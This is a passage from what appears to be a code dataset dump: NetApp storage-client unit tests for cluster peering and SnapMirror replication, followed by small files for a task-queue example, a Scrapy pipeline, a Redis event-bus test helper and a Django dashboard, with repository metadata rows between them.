fake.CLUSTER_PEER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_peers()
cluster_peer_get_iter_args = {}
self.client.send_iter_request.assert_has_calls([
mock.call('cluster-peer-get-iter', cluster_peer_get_iter_args)])
expected = [{
'active-addresses': [
fake.CLUSTER_ADDRESS_1,
fake.CLUSTER_ADDRESS_2
],
'availability': 'available',
'cluster-name': fake.CLUSTER_NAME,
'cluster-uuid': 'fake_uuid',
'peer-addresses': [fake.CLUSTER_ADDRESS_1],
'remote-cluster-name': fake.REMOTE_CLUSTER_NAME,
'serial-number': 'fake_serial_number',
'timeout': '60',
}]
self.assertEqual(expected, result)
def test_get_cluster_peers_single(self):
api_response = netapp_api.NaElement(
fake.CLUSTER_PEER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.client.get_cluster_peers(remote_cluster_name=fake.CLUSTER_NAME)
cluster_peer_get_iter_args = {
'query': {
'cluster-peer-info': {
'remote-cluster-name': fake.CLUSTER_NAME,
}
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('cluster-peer-get-iter', cluster_peer_get_iter_args)])
def test_get_cluster_peers_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_peers(
remote_cluster_name=fake.CLUSTER_NAME)
self.assertEqual([], result)
self.assertTrue(self.client.send_iter_request.called)
def test_delete_cluster_peer(self):
    """Peer deletion sends cluster-peer-delete for the named cluster."""
    self.mock_object(self.client, 'send_request')

    self.client.delete_cluster_peer(fake.CLUSTER_NAME)

    self.client.send_request.assert_has_calls([
        mock.call('cluster-peer-delete',
                  {'cluster-name': fake.CLUSTER_NAME})])
def test_get_cluster_peer_policy(self):
self.client.features.add_feature('CLUSTER_PEER_POLICY')
api_response = netapp_api.NaElement(
fake.CLUSTER_PEER_POLICY_GET_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_peer_policy()
expected = {
'is-unauthenticated-access-permitted': False,
'passphrase-minimum-length': 8
}
self.assertEqual(expected, result)
self.assertTrue(self.client.send_request.called)
def test_get_cluster_peer_policy_not_supported(self):
    """Without the CLUSTER_PEER_POLICY feature an empty dict is returned."""
    result = self.client.get_cluster_peer_policy()

    self.assertEqual({}, result)
def test_set_cluster_peer_policy_not_supported(self):
    """Without the CLUSTER_PEER_POLICY feature no API call is made."""
    self.mock_object(self.client, 'send_request')

    self.client.set_cluster_peer_policy()

    self.assertFalse(self.client.send_request.called)
def test_set_cluster_peer_policy_no_arguments(self):
    """With no keyword arguments there is nothing to modify; no API call."""
    self.client.features.add_feature('CLUSTER_PEER_POLICY')
    self.mock_object(self.client, 'send_request')

    self.client.set_cluster_peer_policy()

    self.assertFalse(self.client.send_request.called)
def test_set_cluster_peer_policy(self):
self.client.features.add_feature('CLUSTER_PEER_POLICY')
self.mock_object(self.client, 'send_request')
self.client.set_cluster_peer_policy(
is_unauthenticated_access_permitted=True,
passphrase_minimum_length=12)
cluster_peer_policy_modify_args = {
'is-unauthenticated-access-permitted': 'true',
'passphrase-minlength': '12',
}
self.client.send_request.assert_has_calls([
mock.call('cluster-peer-policy-modify',
cluster_peer_policy_modify_args)])
def test_create_vserver_peer(self):
self.mock_object(self.client, 'send_request')
self.client.create_vserver_peer('fake_vserver', 'fake_vserver_peer')
vserver_peer_create_args = {
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_peer',
'applications': [
{'vserver-peer-application': 'snapmirror'},
],
}
self.client.send_request.assert_has_calls([
mock.call('vserver-peer-create', vserver_peer_create_args)])
def test_delete_vserver_peer(self):
self.mock_object(self.client, 'send_request')
self.client.delete_vserver_peer('fake_vserver', 'fake_vserver_peer')
vserver_peer_delete_args = {
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_peer',
}
self.client.send_request.assert_has_calls([
mock.call('vserver-peer-delete', vserver_peer_delete_args)])
def test_accept_vserver_peer(self):
self.mock_object(self.client, 'send_request')
self.client.accept_vserver_peer('fake_vserver', 'fake_vserver_peer')
vserver_peer_accept_args = {
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_peer',
}
self.client.send_request.assert_has_calls([
mock.call('vserver-peer-accept', vserver_peer_accept_args)])
def test_get_vserver_peers(self):
api_response = netapp_api.NaElement(
fake.VSERVER_PEER_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_vserver_peers(
vserver_name=fake.VSERVER_NAME,
peer_vserver_name=fake.VSERVER_NAME_2)
vserver_peer_get_iter_args = {
'query': {
'vserver-peer-info': {
'vserver': fake.VSERVER_NAME,
'peer-vserver': fake.VSERVER_NAME_2,
}
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('vserver-peer-get-iter', vserver_peer_get_iter_args)])
expected = [{
'vserver': 'fake_vserver',
'peer-vserver': 'fake_vserver_2',
'peer-state': 'peered',
'peer-cluster': 'fake_cluster'
}]
self.assertEqual(expected, result)
def test_get_vserver_peers_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_vserver_peers(
vserver_name=fake.VSERVER_NAME,
peer_vserver_name=fake.VSERVER_NAME_2)
self.assertEqual([], result)
self.assertTrue(self.client.send_iter_request.called)
def test_ensure_snapmirror_v2(self):
    """With the feature supported, the guard returns None silently."""
    self.assertIsNone(self.client._ensure_snapmirror_v2())
def test_ensure_snapmirror_v2_not_supported(self):
    """With SNAPMIRROR_V2 marked unsupported, the guard raises."""
    self.client.features.add_feature('SNAPMIRROR_V2', supported=False)

    self.assertRaises(exception.NetAppException,
                      self.client._ensure_snapmirror_v2)
@ddt.data({'schedule': 'fake_schedule', 'policy': 'fake_policy'},
{'schedule': None, 'policy': None})
@ddt.unpack
def test_create_snapmirror(self, schedule, policy):
self.mock_object(self.client, 'send_request')
self.client.create_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
schedule=schedule, policy=policy)
snapmirror_create_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'relationship-type': 'data_protection',
}
if schedule:
snapmirror_create_args['schedule'] = schedule
if policy:
snapmirror_create_args['policy'] = policy
self.client.send_request.assert_has_calls([
mock.call('snapmirror-create', snapmirror_create_args)])
def test_create_snapmirror_already_exists(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ERELATION_EXISTS))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.create_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_create_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'relationship-type': 'data_protection',
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-create', snapmirror_create_args)])
def test_create_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.create_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
self.assertTrue(self.client.send_request.called)
@ddt.data(
{
'source_snapshot': 'fake_snapshot',
'transfer_priority': 'fake_priority'
},
{
'source_snapshot': None,
'transfer_priority': None
}
)
@ddt.unpack
def test_initialize_snapmirror(self, source_snapshot, transfer_priority):
api_response = netapp_api.NaElement(fake.SNAPMIRROR_INITIALIZE_RESULT)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.initialize_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
source_snapshot=source_snapshot,
transfer_priority=transfer_priority)
snapmirror_initialize_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
if source_snapshot:
snapmirror_initialize_args['source-snapshot'] = source_snapshot
if transfer_priority:
snapmirror_initialize_args['transfer-priority'] = transfer_priority
self.client.send_request.assert_has_calls([
mock.call('snapmirror-initialize', snapmirror_initialize_args)])
expected = {
'operation-id': None,
'status': 'succeeded',
'jobid': None,
'error-code': None,
'error-message': None
}
self.assertEqual(expected, result)
@ddt.data(True, False)
def test_release_snapmirror(self, relationship_info_only):
self.mock_object(self.client, 'send_request')
self.client.release_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
relationship_info_only=relationship_info_only)
snapmirror_release_args = {
'query': {
'snapmirror-destination-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'relationship-info-only': ('true' if relationship_info_only
else 'false'),
}
}
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-release-iter', snapmirror_release_args)])
def test_quiesce_snapmirror(self):
    """Quiesce passes the full source/destination endpoint tuple."""
    self.mock_object(self.client, 'send_request')

    self.client.quiesce_snapmirror(
        fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
        fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)

    expected_args = {
        'source-vserver': fake.SM_SOURCE_VSERVER,
        'source-volume': fake.SM_SOURCE_VOLUME,
        'destination-vserver': fake.SM_DEST_VSERVER,
        'destination-volume': fake.SM_DEST_VOLUME,
    }
    self.client.send_request.assert_has_calls(
        [mock.call('snapmirror-quiesce', expected_args)])
@ddt.data(True, False)
def test_abort_snapmirror(self, clear_checkpoint):
self.mock_object(self.client, 'send_request')
self.client.abort_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
clear_checkpoint=clear_checkpoint)
snapmirror_abort_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'clear-checkpoint': 'true' if clear_checkpoint else 'false',
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-abort', snapmirror_abort_args)])
def test_abort_snapmirror_no_transfer_in_progress(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ENOTRANSFER_IN_PROGRESS))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.abort_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_abort_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'clear-checkpoint': 'false',
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-abort', snapmirror_abort_args)])
def test_abort_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.abort_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
def test_break_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.break_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_break_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-break', snapmirror_break_args)])
@ddt.data(
{
'schedule': 'fake_schedule',
'policy': 'fake_policy',
'tries': 5,
'max_transfer_rate': 1024,
},
{
'schedule': None,
'policy': None,
'tries': None,
'max_transfer_rate': None,
}
)
@ddt.unpack
def test_modify_snapmirror(self, schedule, policy, tries,
max_transfer_rate):
self.mock_object(self.client, 'send_request')
self.client.modify_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
schedule=schedule, policy=policy, tries=tries,
max_transfer_rate=max_transfer_rate)
snapmirror_modify_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
if schedule:
snapmirror_modify_args['schedule'] = schedule
if policy:
snapmirror_modify_args['policy'] = policy
if tries:
snapmirror_modify_args['tries'] = tries
if max_transfer_rate:
snapmirror_modify_args['max-transfer-rate'] = max_transfer_rate
self.client.send_request.assert_has_calls([
mock.call('snapmirror-modify', snapmirror_modify_args)])
def test_update_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.update_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_update_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-update', snapmirror_update_args)])
def test_update_snapmirror_already_transferring(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ETRANSFER_IN_PROGRESS))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.update_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_update_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-update', snapmirror_update_args)])
def test_update_snapmirror_already_transferring_two(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.EANOTHER_OP_ACTIVE))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.update_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_update_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-update', snapmirror_update_args)])
def test_update_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.update_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
def test_delete_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.delete_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_delete_args = {
'query': {
'snapmirror-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
}
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-destroy-iter', snapmirror_delete_args)])
def test__get_snapmirrors(self):
api_response = netapp_api.NaElement(fake.SNAPMIRROR_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
desired_attributes = {
'snapmirror-info': {
'source-vserver': None,
'source-volume': None,
'destination-vserver': None,
'destination-volume': None,
'is-healthy': None,
}
}
result = self.client._get_snapmirrors(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
desired_attributes=desired_attributes)
snapmirror_get_iter_args = {
'query': {
'snapmirror-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
},
},
'desired-attributes': {
'snapmirror-info': {
'source-vserver': None,
'source-volume': None,
'destination-vserver': None,
'destination-volume': None,
'is-healthy': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('snapmirror-get-iter', snapmirror_get_iter_args)])
self.assertEqual(1, len(result))
def test__get_snapmirrors_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_snapmirrors()
self.client.send_iter_request.assert_has_calls([
mock.call('snapmirror-get-iter', {})])
self.assertEqual([], result)
def test_get_snapmirrors(self):
api_response = netapp_api.NaElement(
fake.SNAPMIRROR_GET_ITER_FILTERED_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
desired_attributes = ['source-vserver', 'source-volume',
'destination-vserver', 'destination-volume',
'is-healthy', 'mirror-state', 'schedule']
result = self.client.get_snapmirrors(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME,
desired_attributes=desired_attributes)
snapmirror_get_iter_args = {
'query': {
'snapmirror-info': {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
},
},
'desired-attributes': {
'snapmirror-info': {
'source-vserver': None,
'source-volume': None,
'destination-vserver': None,
'destination-volume': None,
'is-healthy': None,
'mirror-state': None,
'schedule': None,
},
},
}
expected = [{
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'is-healthy': 'true',
'mirror-state': 'snapmirrored',
'schedule': 'daily',
}]
self.client.send_iter_request.assert_has_calls([
mock.call('snapmirror-get-iter', snapmirror_get_iter_args)])
self.assertEqual(expected, result)
def test_resume_snapmirror(self):
self.mock_object(self.client, 'send_request')
self.client.resume_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_resume_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-resume', snapmirror_resume_args)])
def test_resume_snapmirror_not_quiesed(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(
code=netapp_api.ERELATION_NOT_QUIESCED))
self.mock_object(self.client, 'send_request', mock_send_req)
self.client.resume_snapmirror(
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
snapmirror_resume_args = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
}
self.client.send_request.assert_has_calls([
mock.call('snapmirror-resume', snapmirror_resume_args)])
def test_resume_snapmirror_error(self):
mock_send_req = mock.Mock(side_effect=netapp_api.NaApiError(code=0))
self.mock_object(self.client, 'send_request', mock_send_req)
self.assertRaises(netapp_api.NaApiError, self.client.resume_snapmirror,
fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)
def test_resync_snapmirror(self):
    """Resync passes the full source/destination endpoint tuple."""
    self.mock_object(self.client, 'send_request')

    self.client.resync_snapmirror(
        fake.SM_SOURCE_VSERVER, fake.SM_SOURCE_VOLUME,
        fake.SM_DEST_VSERVER, fake.SM_DEST_VOLUME)

    expected_args = {
        'source-vserver': fake.SM_SOURCE_VSERVER,
        'source-volume': fake.SM_SOURCE_VOLUME,
        'destination-vserver': fake.SM_DEST_VSERVER,
        'destination-volume': fake.SM_DEST_VOLUME,
    }
    self.client.send_request.assert_has_calls(
        [mock.call('snapmirror-resync', expected_args)])
@ddt.data('source', 'destination', None)
def test_volume_has_snapmirror_relationships(self, snapmirror_rel_type):
"""Snapmirror relationships can be both ways."""
vol = fake.FAKE_MANAGE_VOLUME
snapmirror = {
'source-vserver': fake.SM_SOURCE_VSERVER,
'source-volume': fake.SM_SOURCE_VOLUME,
'destination-vserver': fake.SM_DEST_VSERVER,
'destination-volume': fake.SM_DEST_VOLUME,
'is-healthy': 'true',
'mirror-state': 'snapmirrored',
'schedule': 'daily',
}
expected_get_snapmirrors_call_count = 2
expected_get_snapmirrors_calls = [
mock.call(vol['owning-vserver-name'], vol['name'], None, None),
mock.call(None, None, vol['owning-vserver-name'], vol['name']),
]
if snapmirror_rel_type is None:
side_effect = ([], [])
elif snapmirror_rel_type == 'source':
snapmirror['source-vserver'] = vol['owning-vserver-name']
snapmirror['source-volume'] = vol['name']
side_effect = ([snapmirror], None)
expected_get_snapmirrors_call_count = 1
expected_get_snapmirrors_calls.pop()
else:
snapmirror['destination-vserver'] = vol['owning-vserver-name']
snapmirror['destination-volume'] = vol['name']
side_effect = (None, [snapmirror])
mock_get_snapmirrors_call = self.mock_object(
self.client, 'get_snapmirrors', mock.Mock(side_effect=side_effect))
mock_exc_log = self.mock_object(client_cmode.LOG, 'exception')
expected_retval = True if snapmirror_rel_type else False
retval = self.client.volume_has_snapmirror_relationships(vol)
self.assertEqual(expected_retval, retval)
self.assertEqual(expected_get_snapmirrors_call_count,
mock_get_snapmirrors_call.call_count)
mock_get_snapmirrors_call.assert_has_calls(
expected_get_snapmirrors_calls)
self.assertFalse(mock_exc_log.called)
def test_volume_has_snapmirror_relationships_api_error(self):
vol = fake.FAKE_MANAGE_VOLUME
expected_get_snapmirrors_calls = [
mock.call(vol['owning-vserver-name'], vol['name'], None, None),
]
mock_get_snapmirrors_call = self.mock_object(
self.client, 'get_snapmirrors', mock.Mock(
side_effect=self._mock_api_error(netapp_api.EINTERNALERROR)))
mock_exc_log = self.mock_object(client_cmode.LOG, 'exception')
retval = self.client.volume_has_snapmirror_relationships(vol)
self.assertFalse(retval)
self.assertEqual(1, mock_get_snapmirrors_call.call_count)
mock_get_snapmirrors_call.assert_has_calls(
expected_get_snapmirrors_calls)
self.assertTrue(mock_exc_log.called)
| [
"[email protected]"
]
| |
0addb3241276b075663bba6bfbe35a333418cb49 | 845c9539b880c49b297692ab62e40eb0e25ebeab | /examples/tasks.py | 89d493830b8b742e3c0e9eb64e5fcee1c9d009ee | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | mindius/psq | 6c1e28e35b84c143b390e9e9204dff24f6ef7133 | a182a6b751c29dc93b9a13c340b1deed145e3890 | refs/heads/master | 2023-03-01T02:42:42.780322 | 2021-02-09T10:35:13 | 2021-02-09T10:35:13 | 336,299,393 | 1 | 0 | Apache-2.0 | 2021-02-05T14:45:10 | 2021-02-05T14:45:10 | null | UTF-8 | Python | false | false | 704 | py | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
def slow_task(duration=10):
    """Sleep for *duration* seconds to simulate a long-running psq task.

    The previous hard-coded 10-second sleep is preserved as the default,
    so existing queue submissions of ``slow_task`` behave identically;
    callers may now pass a shorter duration (e.g. for tests).

    Args:
        duration: seconds to sleep (default 10).
    """
    time.sleep(duration)
def print_task(value):
    """Print *value* to stdout; demo task showing argument passing via psq."""
    print(value)
def adder(a, b):
    """Return ``a + b`` — demo task showing a psq task with a result."""
    total = a + b
    return total
| [
"[email protected]"
]
| |
c7b4b3fd79a720c7e02837ac27eb2800a44b7f3b | 62587160029c7c79b5d11f16e8beae4afa1c4834 | /webpages/twittscrapper/twittscrapper/pipelines.py | c40b9ecfb6e783c3a0a00f5bcfd87a2b229e9d0b | []
| no_license | LukaszMalucha/Scrapy-Collection | b11dcf2c09f33d190e506559d978e4f3b77f9f5a | 586f23b90aa984c22ea8f84eba664db9649ed780 | refs/heads/master | 2022-12-14T15:06:00.868322 | 2021-07-27T12:09:07 | 2021-07-27T12:09:07 | 144,448,351 | 3 | 0 | null | 2022-11-22T03:16:19 | 2018-08-12T07:55:05 | Python | UTF-8 | Python | false | false | 294 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class TwittscrapperPipeline(object):
    """Default Scrapy item pipeline; currently a no-op pass-through."""

    def process_item(self, item, spider):
        # No cleaning/validation yet: return the item unchanged so any later
        # pipelines configured in ITEM_PIPELINES still receive it.
        return item
| [
"[email protected]"
]
| |
855708304e8f445cffbbbc23fa6d1429ec435a31 | fc85a54686e13e598541df14c472e8aa744e6713 | /tests/modules/extra/redis/mother/redis_domain_event_bus_mother.py | a60fb245abf48a044f881e381f7c89f8d93d7a1d | [
"MIT"
]
| permissive | alice-biometrics/petisco | 63721751cd43e70825b161a5ece535c80d95b6fa | 771ebe5c69dc735b8f373c2e7303d3b4eb655044 | refs/heads/main | 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 | MIT | 2023-09-12T11:06:43 | 2019-10-25T14:48:10 | Python | UTF-8 | Python | false | false | 928 | py | from redis.client import Redis
from petisco.extra.redis import RedisDomainEventBus
from tests.modules.base.mothers.message_meta_mother import MessageMetaMother
from tests.modules.extra.rabbitmq.mother.defaults import (
DEFAULT_ORGANIZATION,
DEFAULT_SERVICE,
)
class RedisDomainEventBusMother:
    """Object mother building pre-configured RedisDomainEventBus fixtures."""

    @staticmethod
    def default(redis_database: Redis):
        """Bus wired to the default organization and service."""
        return RedisDomainEventBus(
            DEFAULT_ORGANIZATION,
            DEFAULT_SERVICE,
            redis_database=redis_database,
        )

    @staticmethod
    def with_service(service: str, redis_database: Redis):
        """Bus for the default organization and a caller-chosen service."""
        return RedisDomainEventBus(
            DEFAULT_ORGANIZATION,
            service,
            redis_database=redis_database,
        )

    @staticmethod
    def with_info_id(redis_database: Redis):
        """Default bus whose message meta carries info context."""
        meta = MessageMetaMother.with_meta_with_info()
        bus = RedisDomainEventBus(
            DEFAULT_ORGANIZATION,
            DEFAULT_SERVICE,
            redis_database=redis_database,
        )
        return bus.with_meta(meta)
| [
"[email protected]"
]
| |
7cc33ebc7a5a6efaa96b3f5637c6c092cbb63f0e | 4e30c855c253cc1d972d29e83edb9d5ef662d30a | /djangox_project/dashboard.py | eb9198581b4738fb580239ff7a68d3b04ec30954 | [
"MIT"
]
| permissive | rajeshr188/django-onex | 8b531fc2f519d004d1da64f87b10ffacbd0f2719 | 0a190ca9bcf96cf44f7773686205f2c1f83f3769 | refs/heads/master | 2023-08-21T22:36:43.898564 | 2023-08-15T12:08:24 | 2023-08-15T12:08:24 | 163,012,755 | 2 | 0 | NOASSERTION | 2023-07-22T09:47:28 | 2018-12-24T17:46:35 | Python | UTF-8 | Python | false | false | 1,948 | py | from controlcenter import Dashboard, widgets
from django.db.models import Count, Sum
from contact.models import Customer
from sales.models import Invoice, Month, Receipt
class InvList(widgets.ItemList):
    """Dashboard widget: list of invoices showing pk, customer and balance."""

    model = Invoice
    list_display = ("pk", "customer", "balance")
class Invoice_count(widgets.SingleBarChart):
    """Bar chart widget: number of invoices created per month."""

    # label and series
    values_list = ("month", "count_items")
    # Data source
    # queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
    # Group invoices by creation month and count them per month.
    queryset = (
        Invoice.objects.annotate(month=Month("created"))
        .values("month")
        .order_by("month")
        .annotate(count_items=Count("id"))
    )
    # limit_to = 10
class Invoice_cash_value(widgets.SingleBarChart):
    """Bar chart widget: total balance of cash-type invoices per month."""

